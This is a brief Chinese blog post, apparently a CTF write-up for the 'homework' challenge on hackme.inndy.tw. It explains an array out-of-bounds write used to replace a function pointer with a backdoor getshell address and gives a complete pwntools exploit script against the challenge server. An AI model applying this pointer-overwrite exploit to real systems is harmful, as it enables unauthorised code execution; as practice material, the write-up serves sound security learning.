homework

作者: 2mpossible | 来源:发表于2018-08-14 17:19 被阅读0次

    数组越界,可以通过编辑功能修改say_goodbye函数的地址为后门函数getshell


    exp:

    from pwn import *
    
    #p = process('./homework')
    p = remote('hackme.inndy.tw',7701)
    
    p.recvuntil('name? ')
    p.sendline('aaaa')
    p.recvuntil('> ')
    p.sendline('1')
    p.recvuntil('edit: ')
    p.sendline('14')
    p.recvuntil('many? ')
    p.sendline(str(0x080485FB))
    
    p.recvuntil('> ')
    p.sendline('0')
    
    p.interactive()
    

    相关文章

      网友评论

          本文标题:homework

          本文链接:https://www.haomeiwen.com/subject/olivbftx.html